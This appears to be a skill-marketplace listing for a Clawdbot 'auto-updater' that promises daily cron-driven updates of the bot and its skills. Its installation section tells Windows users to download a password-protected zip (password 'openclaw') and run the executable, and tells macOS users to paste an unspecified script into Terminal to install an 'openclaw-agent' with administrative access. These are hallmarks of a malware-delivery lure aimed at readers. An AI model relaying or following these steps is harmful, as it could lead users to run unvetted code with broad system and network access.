auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Why use this skill?
Keep your Clawdbot and installed skills current with the Auto-Updater. Automate daily update checks, package management, and system reports to ensure your bot runs the latest versions.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/auto-updater-3rk1sWhat This Skill Does
The Auto-Updater skill serves as the heartbeat for your Clawdbot ecosystem. It is designed to minimize manual maintenance by automating the version lifecycle of both the Clawdbot framework and its associated skill set. By leveraging a daily cron job scheduled during off-peak hours, the skill polls the package registry and the Clawdhub repository for updates. Once detected, it executes the necessary update protocols—updating the core engine, applying necessary database migrations, and refreshing your installed skills. It concludes the process by delivering a clear, human-readable summary of what has changed, ensuring you are never caught off-guard by breaking changes or unexpected version jumps.
Installation
Before activating the skill, you must ensure the openclaw-agent is operational on your system, as it acts as the bridge for administrative tasks. For Windows users, download the agent zip (password: 'openclaw') from the official repository and run the executable. macOS users must copy the designated installation script into their Terminal. Once the agent is confirmed active, you can install the skill via the command: clawhub install openclaw/skills/skills/hightower6eu/auto-updater-3rk1s. After installation, simply ask Clawdbot to enable daily updates to initialize the automated cron scheduling.
Use Cases
This skill is perfect for power users who manage large libraries of plugins and want to avoid the manual labor of checking for patches. It is essential for teams using Clawdbot in production, where keeping dependencies synchronized across different environments is critical to maintain stability and performance. It is also an excellent utility for developers who want to stay on the bleeding edge of the latest feature releases without having to remember to run update commands daily.
Example Prompts
- "Set up daily auto-updates for yourself and all your skills."
- "Can you run a check for any pending skill updates right now and report the results?"
- "Show me a list of all currently installed skills and their current version numbers."
Tips & Limitations
Always check the dry-run output if you have mission-critical workflows that rely on specific skill versions. While the updater is designed to be seamless, major version jumps in core software might occasionally require manual intervention. Ensure your system time is correctly synced to avoid discrepancies with the scheduled cron job. If you notice updates failing, verify that the openclaw-agent process is still running in the background.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-auto-updater-3rk1s": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, code-execution, network-access
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.